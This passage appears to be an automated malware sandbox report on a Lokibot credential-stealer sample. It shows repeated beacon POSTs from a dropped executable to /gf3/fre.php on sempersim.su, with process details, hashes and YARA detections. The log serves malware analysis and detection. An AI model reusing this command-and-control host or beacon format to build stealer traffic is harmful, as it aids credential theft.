                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:54.742448092 CEST1457INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:30 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.44979988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:57.725161076 CEST1458OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:58.254968882 CEST1459INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:34 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.44976288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:51.935858011 CEST1140OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:05:52.472199917 CEST1232INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:28 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.44980088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:00.180937052 CEST1459OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:00.547756910 CEST1460INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:36 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.44980188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:04.571093082 CEST1461OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:05.007163048 CEST1461INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:41 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.44980288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:06.183458090 CEST1462OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:06.643095016 CEST1465INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:42 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.44980888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:08.526354074 CEST6566OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:09.009329081 CEST6567INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.44980988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:12.448956966 CEST6567OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:12.890173912 CEST6568INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:49 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.44981088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:15.237173080 CEST6569OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:15.612334013 CEST7092INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.44981288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:18.160223961 CEST7109OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:18.596982956 CEST7110INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:54 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.44981388.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:20.640279055 CEST7110OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:21.051803112 CEST7111INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:57 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.44981488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:24.436443090 CEST7112OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:24.858928919 CEST7112INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:07:01 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.44981588.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:26.425494909 CEST7113OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:26.831839085 CEST7114INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:07:03 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.44976488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:53.814872980 CEST1233OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:05:54.312279940 CEST1234INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:30 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.44981688.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:29.254760027 CEST7115OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:29.679425955 CEST7116INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:07:05 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.44981888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:32.582865953 CEST7121OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:33.087141037 CEST7121INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:07:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.44981988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:34.959527016 CEST7122OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:35.421030998 CEST7123INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:07:11 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.44982088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:07:36.164319038 CEST7124OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:07:36.607784033 CEST7124INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:07:12 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.44976588.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:56.623177052 CEST1235OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:05:57.102046013 CEST1235INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:33 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.44976788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:58.579153061 CEST1324OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:05:59.063198090 CEST1325INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.44976988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:01.435904026 CEST1339OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:01.883214951 CEST1351INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:38 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.44977188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:03.575680971 CEST1352OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:03.992033958 CEST1354INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.44977788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:09.141151905 CEST1384OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:09.618552923 CEST1385INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Click to jump to process

                  Target ID:0
                  Start time:17:05:30
                  Start date:04/05/2022
                  Path:C:\Users\user\Desktop\dhGoVvfmul.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\dhGoVvfmul.exe"
                  Imagebase:0x400000
                  File size:125839 bytes
                  MD5 hash:5C5D4E3E0DADFF03DA7B9878ACF3E706
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Target ID:1
                  Start time:17:05:31
                  Start date:04/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                  Imagebase:0x400000
                  File size:4096 bytes
                  MD5 hash:99DF91CF3E9775BE40FE27FEFA10C203
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 46%, Virustotal, Browse
                  • Detection: 24%, ReversingLabs
                  Reputation:low

                  Target ID:2
                  Start time:17:05:32
                  Start date:04/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                  Imagebase:0x400000
                  File size:4096 bytes
                  MD5 hash:99DF91CF3E9775BE40FE27FEFA10C203
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
